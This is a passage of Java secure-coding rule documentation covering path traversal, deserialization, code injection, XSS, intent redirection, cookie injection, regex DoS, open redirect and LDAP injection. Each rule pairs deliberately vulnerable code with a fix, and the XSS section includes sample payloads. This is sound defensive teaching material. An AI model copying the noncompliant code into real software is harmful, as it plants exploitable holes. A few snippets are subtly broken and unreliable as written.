The following code is vulnerable to a file system oracle as it allows testing the existence of a file anywhere on the file system.

Noncompliant code example

import java.io.File;

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/exists")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        if (!file.exists()) { // Noncompliant
            throw new IOException("File does not exists in the target directory");
        }
    }
}

Compliant solution

import java.io.File;

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/exists")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        String canonicalDestinationPath = file.getCanonicalPath();

        if (!canonicalDestinationPath.startsWith(targetDirectory)) {
            throw new IOException("Entry is outside of the target directory");
        } else if (!file.exists()) {
            throw new IOException("File does not exists in the target directory");
        }
    }
}

How does this work?

Canonical path validation

The universal way to avoid filesystem oracle vulnerabilities is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal (see the "Pitfalls" section).
  2. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalPath. This will resolve relative paths or path components like ../ and remove any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

@GetMapping(value = "/endpoint")
public void endpoint(@RequestParam("folder") fileName) throws IOException {

    String canonicalizedFileName = fileName.getCanonicalPath();

    if (!canonicalizedFileName.startsWith(targetDirectory)) {
        throw new IOException("Entry is outside of the target directory");
    }
}

This check can be bypassed if other directories start with John. For instance, "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Do not use java.nio.file.Path.resolve as a validator

As specified in the official documentation, if the given parameter is an absolute path, the base object from which the method is called is discarded and is not included in the resulting string.

This means that including untrusted data in the parameter and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

javasecurity:S5135

Why is this an issue?

Deserialization injections occur when applications deserialize wholly or partially untrusted data without verification.

What is the potential impact?

In the context of a web application performing unsafe deserialization:
After detecting the injection vector, attackers inject a carefully-crafted payload into the application.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attackers succeed in injecting an object of the expected class, but with malicious properties that affect the object’s behavior.

If the application relies on the properties of the deserialized object, attackers can modify the data structure or content to escalate privileges or perform unwanted actions.
In the context of an e-commerce application, this could be changing the number of products or prices.

Full application compromise

In the worst-case scenario, the attackers succeed in injecting an object of a completely different class than expected, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker additionally manages to elevate his privileges as an administrator and attack other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised through a combination of unsafe deserialization and misconfiguration:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Java SE

Code examples

The following code is vulnerable to deserialization attacks because it deserializes HTTP data without validating it first.

Noncompliant code example

public class RequestProcessor {
  protected void doGet(HttpServletRequest request, HttpServletResponse response) {
    ServletInputStream servletIS = request.getInputStream();
    ObjectInputStream  objectIS  = new ObjectInputStream(servletIS);
    Object input                 = objectIS.readObject();
  }
}

Compliant solution

public class SecureObjectInputStream extends ObjectInputStream {

  @Override
  protected Class<?> resolveClass(ObjectStreamClass osc) throws IOException, ClassNotFoundException {

    List<String> approvedClasses = new ArrayList<String>();
    approvedClasses.add(AllowedClass1.class.getName());
    approvedClasses.add(AllowedClass2.class.getName());

    if (!approvedClasses.contains(osc.getName())) {
      throw new InvalidClassException("Unauthorized deserialization", osc.getName());
    }

    return super.resolveClass(osc);
  }
}

public class RequestProcessor {
  protected void doGet(HttpServletRequest request, HttpServletResponse response) {
    ServletInputStream servletIS = request.getInputStream();
    ObjectInputStream  objectIS  = new SecureObjectInputStream(servletIS);
    Object input                 = objectIS.readObject();
  }
}

How does this work?

Allowing users to provide data for deserialization generally creates more problems than it solves.

Anything that can be done through deserialization can generally be done with more secure data structures.
Therefore, our first suggestion is to avoid deserialization in the first place.

However, if deserialization mechanisms are valid in your context, here are some security suggestions.

More secure serialization methods

Some more secure serialization methods reduce the risk of security breaches, although not definitively.

A complete object serializer is probably unnecessary if you only need to receive primitive data (for example integers, strings, bools, etc.).
In this case, formats such as JSON and XML protect the application from deserialization attacks by default.

For more complex objects, the next step is to control which class fields are exposed by creating class-specific serialization methods.
The most common method is to use Data Transfer Objects (DTO) patterns or Google Protocol Buffers (protobufs). After creating the Protobuf data structure, the Protobuf compiler creates class files that handle operations such as serializing and deserializing data.

Integrity check

Message authentication codes (MAC) can be used to prevent tampering with serialized data that is meant to be stored outside the application server:

  • On the server-side, when serializing an object, compute a MAC of the result and append it to the serialized object string.
  • When the serialized value is submitted back, verify the serialization string MAC on the server side before deserialization.

Depending on the situation, two MAC computation modes can be used.

If the same application will be responsible for the MAC computing and validation, a symmetric signature algorithm can be used. In that case, HMAC should be preferred, with a strong underlying hash algorithm such as SHA-256.

If multiple parties have to validate the serialized data, an asymetric signature algorithm should be used. This will reduce the chances for a signing secret to be leaked. In that case, the RSASSA-PSS algorithm can be used.

Note: Be sure to store the signing secret securely.

Pre-Approved classes

As a last resort, create a list of approved and safe classes that the application should be able to deserialize.
If the untrusted class does not match an entry in this list, it should be rejected because it is considered unsafe.

Note: Untrusted classes should be filtered out during deserialization, not after.
Depending on the language or framework, this should be possible by overriding the serialization process or using native capabilities to restrict type deserialization.

In the previous example, the pre-approved list uses class names to validate the deserialized class.

Resources

Standards

javasecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Commons Compiler

Code examples

The following code is vulnerable to arbitrary code execution because it compiles and runs HTTP data.

Noncompliant code example

import org.codehaus.janino.ScriptEvaluator;

@Controller
public class ExampleController
{
    @GetMapping(value = "/")
    public void exec(@RequestParam("message") String message) throws IOException, InvocationTargetException {
        ScriptEvaluator se = new ScriptEvaluator();
        se.cook("System.out.println(\" + message \");");
        se.evaluate(null);
    }
}

Compliant solution

import org.codehaus.janino.ScriptEvaluator;

@Controller
public class ExampleController
{
    @GetMapping(value = "/")
    public void exec(@RequestParam("message") String message) throws IOException, InvocationTargetException {
        ScriptEvaluator se = new ScriptEvaluator();
        se.setParameters(new String[] { "input" }, new Class[] { String.class });
        se.cook("System.out.println(input);");
        se.evaluate(new Object[] { message });
    }
}

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code and not that its value is expanded into it. After that, the dynamic code will be able to safely access the untrusted parameter content and perform the processing.

The compliant code example uses such an approach.

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

Resources

Articles & blog posts

Standards

javasecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that his target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in loss of integrity and theft of the benevolent user’s data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in JSP

Code examples

The following code is vulnerable to cross-site scripting because JSP does not auto-escape variables.

User input embedded in HTML code should be HTML-encoded to prevent the injection of additional code. This can be done with the OWASP Java Encoder or similar libraries.

Noncompliant code example

<%@page contentType="text/html" pageEncoding="UTF-8"%>
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<!doctype html>
<html>
 <body>
  <h1>${param.title}</h1>    <!-- Noncompliant -->
 </body>
</html>

Compliant solution

<%@page contentType="text/html" pageEncoding="UTF-8"%>
<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %>
<!doctype html>
<html>
 <body>
  <h1>${e:forHtml(param.title)}</h1>
 </body>
</html>

How does this work?

Template engines are used by web applications to build HTML content. Template files contain static HTML as well as template language instruction. These instructions allow, for example, to insert dynamic values into the document as the template is rendered.

Encode data according to the HTML context

The best approach to protect against XSS is to systematically encode data that is written to HTML documents. The goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

XSS exploitation techniques vary depending on the HTML context where malicious input is injected. For each HTML context, there is a specific encoding to prevent JavaScript code from being interpreted. The following table summarizes the encoding to apply for each HTML context.

ContextCode exampleExploit exampleEncoding

Inbetween tags

<!doctype html>
<div>
  { data }
</div>
<!doctype html>
<div>
  <script>
    alert(1)
  </script>
</div>

HTML entity encoding: replace the following characters by HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an attribute surrounded with single or double quotes

<!doctype html>
<div tag="{ data }">
  ...
</div>
<!doctype html>
<div tag=""
     onmouseover="alert(1)">
  ...
</div>

HTML entity encoding: replace the following characters with HTML-safe sequences.

  • & → &amp;
  • < → &lt;
  • > → &gt;
  • " → &quot;
  • ' → &#x27;

In an unquoted attribute

<!doctype html>
<div tag={ data }>
  ...
</div>
<!doctype html>
<div tag=foo
     onmouseover=alert(1)>
  ...
</div>

Dangerous context: HTML output encoding will not prevent XSS fully.

In a URL attribute

<!doctype html>
<a href="{ data }">
  ...
</a>
<!doctype html>
<a href="javascript:alert(1)">
  ...
</a>

Validate the URL by parsing the data. Make sure relative URLs start with a / and that absolute URLs use https as a scheme.

In a script block

<!doctype html>
<script>
  { data }
</script>
<!doctype html>
<script>
  alert(1)
</script>

Dangerous context: HTML output encoding will not prevent XSS fully. To pass values to a JavaScript context, the recommended way is to use a data attribute:

<!doctype html>
<script data="{ data }">
  ...
</script>

org.owasp.encoder.Encode.forHtml is the recommended method to encode HTML entities.

Pitfalls

Content-types

Be aware that there are more content-types than text/html that allow to execute JavaScript code in a browser and thus are prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls. It is only a matter of time for malicious users to find the exploitation payload that will defeat the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URI.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.
Learn more here.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

javasecurity:S6384

Why is this an issue?

Intent redirection vulnerabilities occur when an application publicly exposes a feature that uses an externally provided intent to start a new component.

In that case, an application running on the same device as the affected one can launch the exposed, vulnerable component and provide it with a specially crafted intent. Depending on the application’s configuration and logic, this intent will be used in the context of the vulnerable application, which poses a security threat.

What is the potential impact?

An affected component that forwards a malicious externally provided intent does so using the vulnerable application’s context. In particular, the new component is created with the same permissions as the application and without limitations on what feature can be reached.

Therefore, an attacker exploiting an intent redirection vulnerability could manage to access a private application’s components. Depending on the features privately exposed, this can lead to further exploitations, sensitive data disclosure, or even persistent code execution.

Information disclosure

An attacker can use the affected feature as a gateway to access other components of the vulnerable application, even if they are not exported. This includes features that handle sensitive information.

Therefore, by crafting a malicious intent and submitting it to the vulnerable redirecting component, an attacker can retrieve most data exposed by private features. This affects the confidentiality of information that is not protected by an additional security mechanism, such as an encryption algorithm.

Attack surface increase

Because the attacker can access most components of the application, they can identify and exploit other vulnerabilities that would be present in them. The actual impact depends on the nested vulnerability. Exploitation probability depends on the in-depth security level of the application.

Privilege escalation

If the vulnerable application has privileges on the underlying devices, an attacker exploiting the redirection issue might take advantage of them. For example by crafting a malicious intent action, the attacker could be able to pass phone calls on behalf of the entitled application.

This can lead to various attack scenarios depending on the exploited permissions.

Persistent code execution

A lot of applications rely on dynamic code loading to implement a variety of features, such as:

  • Minor feature updates.
  • Application package size reduction.
  • DRM or other code protection features.

When a component exposes a dynamic code loading feature, an attacker could use it during the redirection’s exploitation to deploy malicious code into the application. The component can be located in the application itself or one of its dependencies.

Such an attack would compromise the application execution environment entirely and lead to multiple security threats. The malicious code could:

  • Intercept and exfiltrate all data used in the application.
  • Steal authentication credentials to third-party services.
  • Change the application’s behavior to serve another malicious purpose (phishing, ransoming, etc)

Note that in most cases, the deployed malware can persist application or hosting device restarts.

How to fix it in Android

Code examples

This code is vulnerable to intent injection attacks because it starts a new activity from a user-provided intent without prior validation.

Noncompliant code example

public class Noncompliant extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        Intent intent = getIntent();
        Intent forward = (Intent) intent.getParcelableExtra("anotherintent");
        startActivity(forward); // Noncompliant
    }
}

Compliant solution

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        Intent intent = getIntent();
        Intent forward = (Intent) intent.getParcelableExtra("anotherintent");

        ComponentName name = forward.resolveActivity(getPackageManager());
        if (name.getPackageName().equals("safePackage") &&
                name.getClassName().equals("safeClass")) {
            startActivity(forward);
        }
    }
}

How does this work?

In general, security best practices discourage forwarding intents. However, when the application requires such a feature, it should precisely check the forwarded intents to ensure they do not pass malicious content.

Additionally, the components that are not meant to be accessed externally should be marked as non-exported in the application’s manifest. This is done by setting the android:exported attribute of the components to "false".

Checking the intent destination

Most unintended usage of the forwarding feature can be prevented by verifying whether the destination package and class names belong to a list of accepted components.

The allow-list of accepted destinations should only contain components that perform non-sensitive actions and handle non-sensitive data. Moreover, it should not allow reaching components that further redirect inner intents.

The example compliant code uses the resolveActivity method of the inner intent to determine its target component. It then uses the getPackageName and getClassName methods to validate this destination is not sensitive.

Checking the intent origin

Before forwarding the intent, the application can check its origin. Verifying the origin package is trusted prevents the forwarding feature from being used by an external component.

The getCallingActivity method of the forwarded intent can be used to determine the origin component.

Permissions downgrade

Before forwarding an intent to another component, the application can verify or remove the permissions set on the forwarded intent. In that case, even if the destination is a sensitive component, the application can ensure the untrusted intent will not be able to read or write sensitive data or locations.

In most cases, the application should drop the following permissions from untrusted intents:

  • FLAG_GRANT_READ_URI_PERMISSION
  • FLAG_GRANT_WRITE_URI_PERMISSION

Resources

Documentation

Standards

javasecurity:S2083

Why is this an issue?

Path injections occur when an application uses untrusted data to construct a file path and access this file without validating its path first.

A user with malicious intent would inject specially crafted values, such as ../, to change the initial intended path. The resulting path would resolve somewhere in the filesystem where the user should not normally have access to.

What is the potential impact?

A web application is vulnerable to path injection and an attacker is able to exploit it.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with root privileges on Linux, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Override or delete arbitrary files

The injected path component tampers with the location of a file the application is supposed to delete or write into. The vulnerability is exploited to remove or corrupt files that are critical for the application or for the system to work properly.

It could result in data being lost or the application being unavailable.

Read arbitrary files

The injected path component tampers with the location of a file the application is supposed to read and output. The vulnerability is exploited to leak the content of arbitrary files from the file system, including sensitive files like SSH private keys.

How to fix it in Java SE

Code examples

The following code is vulnerable to path injection as it creates a path using untrusted data without validation.

An attacker can exploit the vulnerability in this code to delete arbitrary files.

Noncompliant code example

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/delete")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        file.delete();
    }
}

Compliant solution

@Controller
public class ExampleController
{
    static private String targetDirectory = "/path/to/target/directory/";

    @GetMapping(value = "/delete")
    public void delete(@RequestParam("filename") String filename) throws IOException {

        File file = new File(targetDirectory + filename);
        String canonicalDestinationPath = file.getCanonicalPath();

        if (!canonicalDestinationPath.startsWith(targetDirectory)) {
            throw new IOException("Entry is outside of the target directory");
        }

        file.delete();
    }
}

How does this work?

Canonical path validation

If it is impossible to use secure-by-design APIs that do this automatically, the universal way to prevent path injection is to validate paths constructed from untrusted data:

  1. Ensure the target directory path ends with a forward slash to prevent partial path traversal, for example, /base/dirmalicious starts with /base/dir but does not start with /base/dir/.
  2. Resolve the canonical path of the file by using methods like java.io.File.getCanonicalPath. This will resolve relative path or path components like ../ and removes any ambiguity regarding the file’s location.
  3. Check that the canonical path is within the directory where the file should be located.

Important Note: The order of this process pattern is important. The code must follow this order exactly to be secure by design:

  1. data = transform(user_input);
  2. data = normalize(data);
  3. data = sanitize(data);
  4. use(data);

As pointed out in this SonarSource talk, failure to follow this exact order leads to security vulnerabilities.

Pitfalls

Partial Path Traversal

When validating untrusted paths by checking if they start with a trusted folder name, ensure the validation string contains a path separator as the last character.
A partial path traversal vulnerability can be unintentionally introduced into the application without a path separator as the last character of the validation strings.

For example, the following code is vulnerable to partial path injection. Note that the string targetDirectory does not end with a path separator:

static private String targetDirectory = "/Users/John";

@GetMapping(value = "/endpoint")
public void endpoint(@RequestParam("folder") fileName) throws IOException {

    String canonicalizedFileName = fileName.getCanonicalPath();

    if (!canonicalizedFileName .startsWith(targetDirectory)) {
        throw new IOException("Entry is outside of the target directory");
    }
}

This check can be bypassed because "/Users/Johnny".startsWith("/Users/John") returns true. Thus, for validation, "/Users/John" should actually be "/Users/John/".

Warning: Some functions, such as .getCanonicalPath, remove the terminating path separator in their return value.
The validation code should be tested to ensure that it cannot be impacted by this issue.

Here is a real-life example of this vulnerability.

Do not use java.nio.file.Path.resolve as a validator

As specified in the official documentation, if the given parameter is an absolute path, the base object from which the method is called is discarded and is not included in the resulting string.

This means that including untrusted data in the parameter and using the resulting string for file operations may lead to a path traversal vulnerability.

Resources

Standards

javasecurity:S6287

Why is this an issue?

Session Cookie Injection occurs when a web application assigns session cookies to users using untrusted data.

Session cookies are used by web applications to identify users. Thus, controlling these enable control over the identity of the users within the application.

The injection might occur via a GET parameter, and the payload, for example, https://example.com?cookie=injectedcookie, delivered using phishing techniques.

What is the potential impact?

A well-intentioned user opens a malicious link that injects a session cookie in their web browser. This forces the user into unknowingly browsing a session that isn’t theirs.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Sensitive data disclosure

A victim introduces sensitive data within the attacker’s application session that can later be retrieved by them. This can lead to a variety of implications depending on what type of data is disclosed. Strictly confidential user data or organizational data leakage have different impacts.

Vulnerability chaining

An attacker not only manipulates a user into browsing an application using a session cookie of their control but also successfully detects and exploits a self-XSS on the target application.
The victim browses the vulnerable page using the attacker’s session and is affected by the XSS, which can then be used for a wide range of attacks including credential stealing using mirrored login pages.

How to fix it in Java SE

Code examples

The following code is vulnerable to Session Cookie Injection as it assigns a session cookie using untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
    Optional<Cookie> cookieOpt = Arrays.stream(request.getCookies())
                                    .filter(c -> c.getName().equals("jsessionid"))
                                    .findFirst();

    if (!cookieOpt.isPresent()) {
        String cookie = request.getParameter("cookie");
        Cookie cookieObj = new Cookie("jsessionid", cookie);
        response.addCookie(cookieObj);
    }

    response.sendRedirect("/welcome.jsp");
}

Compliant solution

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
    Optional<Cookie> cookieOpt = Arrays.stream(request.getCookies())
                                    .filter(c -> c.getName().equals("jsessionid"))
                                    .findFirst();

    if (!cookieOpt.isPresent()) {
        response.sendRedirect("/getCookie.jsp");
    } else {
        response.sendRedirect("/welcome.jsp");
    }
}

How does this work?

Untrusted data, such as GET or POST request content, should always be considered tainted. Therefore, an application should not blindly assign the value of a session cookie to untrusted data.

Session cookies should be generated using the built-in APIs of secure libraries that include session management instead of developing homemade tools.
Often, these existing solutions benefit from quality maintenance in terms of features, security, or hardening, and it is usually better to use these solutions than to develop your own.

Resources

Standards

javasecurity:S2631

Why is this an issue?

Regular expression injections occur when the application retrieves untrusted data and uses it as a regex to pattern match a string with it.

Most regular expression search engines use backtracking to try all possible regex execution paths when evaluating an input. Sometimes this can lead to performance problems also referred to as catastrophic backtracking situations.

What is the potential impact?

In the context of a web application vulnerable to regex injection:
After discovering the injection point, attackers insert data into the vulnerable field to make the affected component inaccessible.

Depending on the application’s software architecture and the injection point’s location, the impact may or may not be visible.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Self Denial of Service

In cases where the complexity of the regular expression is exponential to the input size, a small, carefully-crafted input (for example, 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application.

Super-linear regex complexity can produce the same effects for a large, carefully crafted input (thousands of chars).

If the component jeopardized by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service might only affect the attacker who initiated it.

Such benign denial of service can also occur in architectures that rely heavily on containers and container orchestrators. Replication systems would detect the failure of a container and automatically replace it.

Infrastructure SPOFs

However, a denial of service attack can be critical to the enterprise if it targets a SPOF component. Sometimes the SPOF is a software architecture vulnerability (such as a single component on which multiple critical components depend) or an operational vulnerability (for example, insufficient container creation capabilities or failures from containers to terminate).

In either case, attackers aim to exploit the infrastructure weakness by sending as many malicious payloads as possible, using potentially huge offensive infrastructures.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Java SE

Code examples

The following noncompliant code is vulnerable to Regex Denial of Service because untrusted data is used as a regex to scan a string without prior sanitization or validation.

Noncompliant code example

public boolean validate(HttpServletRequest request) {
  String regex = request.getParameter("regex");
  String input = request.getParameter("input");

  return input.matches(regex);
}

Compliant solution

public boolean validate(HttpServletRequest request) {
  String regex = request.getParameter("regex");
  String input = request.getParameter("input");

  return input.matches(Pattern.quote(regex));
}

How does this work?

Sanitization and Validation

Metacharacters escape using native functions is a solution against regex injection.
The escape function sanitizes the input so that the regular expression engine interprets these characters literally.

An allowlist approach can also be used by creating a list containing authorized and secure strings you want the application to use in a query.
If a user input does not match an entry in this list, it should be considered unsafe and rejected.

Important Note: The application must sanitize and validate on the server side. Not on client-side front end.

Where possible, use non-backtracking regex engines, for example, Google’s re2.

In the example, Pattern.quote escapes metacharacters and escape sequences that could have broken the initially intended logic.

Resources

Articles & blog posts

Standards

javasecurity:S5146

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to redirect users to a URL.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com?url=evil.example.com, to redirect the victim to his evil domain.

Tricking users into sending the malicious HTTP request is usually the main task of exploiting an open redirection. Often, it requires an attacker to build a credible pretext to prevent suspicions from the victim.

Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of his choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker’s controlled website mirroring the interface of a web application trusted by the user. Due to the similarity in the application appearance and the apparently trustable clicked hyperlink, the user struggles to identify that they are browsing on a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker’s controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that would result in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Java SE

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String location = req.getParameter("url");
  resp.sendRedirect(location);
}

Compliant solution

protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws IOException {
  String location = req.getParameter("url");

  List<String> allowedHosts = new ArrayList<String>();
  allowedHosts.add("https://trusted1.example.com/");
  allowedHosts.add("https://trusted2.example.com/");

  if (allowedHosts.contains(location))
    resp.sendRedirect(location);
}

How does this work?

Built-in framework methods should be preferred as, more often than not, these provide additional security mechanisms. Usually, these built-in methods are engineered for internal page redirections. Thus, they might not be the solution for the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

javasecurity:S2078

Why is this an issue?

LDAP injections occur in an application when the application retrieves untrusted data and inserts it into an LDAP query without sanitizing it first.

An LDAP injection can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
The absence of the corresponding response for the malicious request on the application is not a barrier to exploitation. Thus, it must be treated the same way as basic LDAP injections.

What is the potential impact?

In the context of a web application vulnerable to LDAP injection: after discovering the injection point, attackers insert data into the vulnerable field to execute malicious LDAP commands.

The impact of this vulnerability depends on how vital LDAP servers are to the organization.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Data leakage or corruption

In typical scenarios where systems perform innocuous LDAP operations to find users or create inventories, an LDAP injection could result in data leakage or corruption.

Privilege escalation

A malicious LDAP query could allow an attacker to impersonate a low-privileged user or an administrator in scenarios where systems perform authorization checks or authentication.

Attackers use this vulnerability to find multiple footholds on target organizations by gathering authentication bypasses.

How to fix it in Java SE

Code examples

